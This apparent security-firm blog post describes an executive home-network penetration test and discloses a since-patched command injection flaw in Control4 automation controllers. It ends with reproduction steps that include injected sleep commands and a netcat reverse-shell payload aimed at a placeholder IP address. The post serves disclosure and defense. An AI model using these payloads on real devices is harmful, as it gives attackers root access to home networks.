Aon’s Cyber Secure Select offers products and services that help protect the assets of executives, high-net-worth individuals, and their families. The Executive Vulnerability Assessment is a personalized security vulnerability evaluation meant to assess and improve an individual’s security posture. Continuing our APT X series, this blog post provides a small insight into what happens behind the scenes during the home network penetration testing phase of an Executive Vulnerability Assessment by demonstrating what a real-world Advanced Persistent Threat attack against an individual might look like. This includes the details of a zero-day vulnerability discovered and leveraged during an actual assessment.
Executive Vulnerability Assessments help our clients better understand their personal attack surface. Ultimately, this helps our clients protect themselves against targeted attacks that may lead to the unauthorized disclosure of sensitive personal or corporate information that may be accessible from an executive’s home network.
In this type of engagement, the initial foothold within the network of a high-net-worth individual is often obtained by targeting devices used by their family members. Online reconnaissance is performed to identify the types of technology the family may utilize followed by the deployment of some preliminary payloads to improve situational awareness of the victim’s environment, prior to sending more complex payloads. Social engineering is the primary technique that helps deliver these payloads to the victim(s) and, upon successful execution, an initial foothold is established within a home network. In some cases, wireless attacks are viable and provide an easy initial foothold within the home network as well.
During the course of an engagement last summer after establishing an initial foothold within the executive’s network, we discovered a zero-day vulnerability affecting Control4 home automation systems running firmware versions prior to 3.2.0, such as the EA-1 and EA-3 Entertainment and Automation Controller devices. This vulnerability presented the attacker with remote code execution capabilities as the root user on the underlying operating system. The issue was disclosed to Control4, who responded that they were already aware of the issue and a fix was currently in beta. Nevertheless, they thanked us for the report. Control4 has since informed us that the vulnerability has been remediated in firmware version 3.2.0, released in October 2020. Neither Aon nor Control4 are aware of any exploitation of this vulnerability in the wild, and we would like to commend Control4 for quickly patching the issue. Users of affected systems are advised to contact a certified Control4 dealer to arrange for a firmware update. If this is not possible, we recommend placing affected devices in a separate network segment that is isolated from high-value devices.
Vulnerabilities in entertainment systems and other IoT devices can often yield a potent foothold within a home network. In this case, we utilized this vulnerability, as well as a few others, to establish long-term persistence within multiple hosts inside the network.
Due to the increasing prevalence of IoT devices, it becomes critically important for individuals to implement positive security practices in their own households. The following non-exhaustive list contains some suggestions:
- Implement network segmentation to isolate non-critical devices from high-value devices.
- Conduct routine inventory of what is running inside your home network. Minimize the number of devices online and ensure that every device is running the most recent versions of firmware / software.
- Ensure that every exposed service on every device is protected with a strong password, if possible.
- Ensure that default passwords are changed when the devices are configured.
- Ensure that access points utilize a strong password and are protected by at least WPA2-PSK for home networks, although certificate-based authentication is preferable but likely not practical for most households.
- Ensure that port-forwarding is disabled on routers, particularly if these devices are externally exposed.
- Ensure that previously compromised credentials, such as from public password breaches, are not utilized.
- Identify the purpose of and limit any externally exposed services on your router.
The following section provides in-depth technical details of the remote code execution vulnerability discovered during the assessment.
Remote Code Execution in Control4 Entertainment and Automation Controller Devices
Overview
Control4 Entertainment and Automation Controller devices such as the EA-1 and EA-3 have a management interface implemented as a web application. This management interface provides a feature that allows authenticated administrators to view the device’s log files. The log retrieval functionality in firmware versions prior to 3.2.0 is vulnerable to remote code execution via command injection. The following steps describe how to reproduce this vulnerability on the affected devices.
Reproduction Steps
1. Open the device’s administrative interface in a web browser and login as the System Admin user.
2. The System Admin password was not initially known during this assessment, but the targeted device still had the default password set for that account. This credential can be found at this public site: http://open-sez.me/passwd-control4.htm
3. After signing in, the Home screen will be displayed. Click on System Manager.
4. In the System Manager screen, click on a device under Discovered Devices.
5. After selecting a discovered device, click on Logging.
6. Under Logging, click on the name of a log file to retrieve. In this case, lighttpd was selected.
7. The following page will be displayed with an error message indicating that the /var/log/lighthttpd.log file does not exist.
8. Using a proxy tool such as the Burp Suite, examine the HTTP request made to obtain the lighttpd.log file and the error message returned in the response. The error message discloses the operating system command that was executed in order to retrieve the lighttpd.log file.
9. Using Burp Suite, manipulate the previous request to inject a call to the sleep command with a duration of 6 seconds and check the request response time. The injected payload in this case was ‘&sleep${IFS}6&’
.
10. In order to confirm that the sleep command successfully executed, manipulate the same request again but this time change the sleep duration to 7 seconds. The response time should be approximately 7 seconds as seen in the screenshot below. The injected payload in this case was ‘&sleep${IFS}7&’
.
11. For a full remote shell as the root user, use the following payload replacing IP_ADDRESS with the public IP address of a server you control, which has a netcat listener running on port 4444. The injected payload should look like the following:
'&nc${IFS}IP_ADDRESS${IFS}4444${IFS}-e${IFS}${SHELL:0:1}bin${SHELL:0:1}sh&'
Note that the same process applies to obtain RCE on Control4 EA-1 devices using the same firmware version.
Author: Faisal Tameesh (@primal0xF7)
Copyright 2021 Aon Plc